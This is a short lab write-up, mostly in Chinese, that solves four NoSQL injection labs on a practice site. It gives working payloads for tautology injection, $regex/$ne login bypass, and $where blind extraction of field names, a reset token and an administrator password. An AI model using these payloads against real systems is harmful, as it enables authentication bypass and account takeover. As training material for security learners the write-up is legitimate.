Detecting NoSQL injection
检测注入点,发现category参数存在注入漏洞
?category=Lifestyle'%20%26%26%201%20%26%26%20'x
使用永真式即可检索出隐藏内容
?category=Lifestyle%27%20%7C%7C%201%20%7C%7C%20%27x
Exploiting NoSQL operator injection to bypass authentication
To solve the lab, log into the application as the administrator user.
You can log in to your own account using the following credentials: wiener:peter.
登陆时可以发现username和password参数存在注入漏洞
{"username":{"$regex":"w.*"},"password":"peter"}
{"username":{"$regex":"ad.*"},"password":{"$ne":""}}
然后截获session cookie和id发包即可成功越权
Exploiting NoSQL operator injection to extract unknown fields
To solve the lab, log in as carlos
登陆再用"$ne":""会报account locked,但使用where返回结果一样,说明where注入成功了
{"username":"carlos","password":{"$ne":""},"$where":"1"}
所以用盲注判断获取字段名
"$where":"Object.keys(this)[0].match('^.{0}a.*')"
this指当前文档,Object.keys(this)会获取当前文档的所有“键(字段名)”,并组合成一个数组
^.{0}指从字段名的第几位开始,后面对该为字符进行匹配
我们使用bp字段的集束炸弹来进行盲注
可以查到5个字段:_id,username,password,email,resetToken
对password字段进行盲注,最终获取到管理员的密码是lombn6ea8dv30mk0tgv6
{"username":"carlos","password":{"$ne":""},"$where":"this.password.match('^.{0}a.*')"}
结果输入密码登陆显示该用户已锁定
我们换一种方式,点击忘记密码,再get传参?resetToken=invalid
发现回显invalid token,说明resetToken参数可控
我们继续盲注爆破出resetToken字段的值:e8fa8f4c41d7881e
忘记密码get传参?resetToken=e8fa8f4c41d7881e,跳转到用户密码重置界面。重置后即可登陆carlos账号
Exploiting NoSQL injection to extract data
To solve the lab, extract the password for the administrator user, then log in to their account.
在/user/lookup?user中传参wiener' && '1'=='1发现与传参wiener返回结果相同,说明存在条件性行为
{"username":"wiener' && '1'=='1"}
发送
administrator' && this.password.length < 30 || 'a'=='b
返回administrator信息,说明密码长度小于30,借此通过intruder进行爆破
可以看出密码长度为8
通过
administrator' && this.password.match(/^.{0}a.*/) || 'a'=='b
进行盲注爆破,得到密码为auuitexq
登陆管理员即可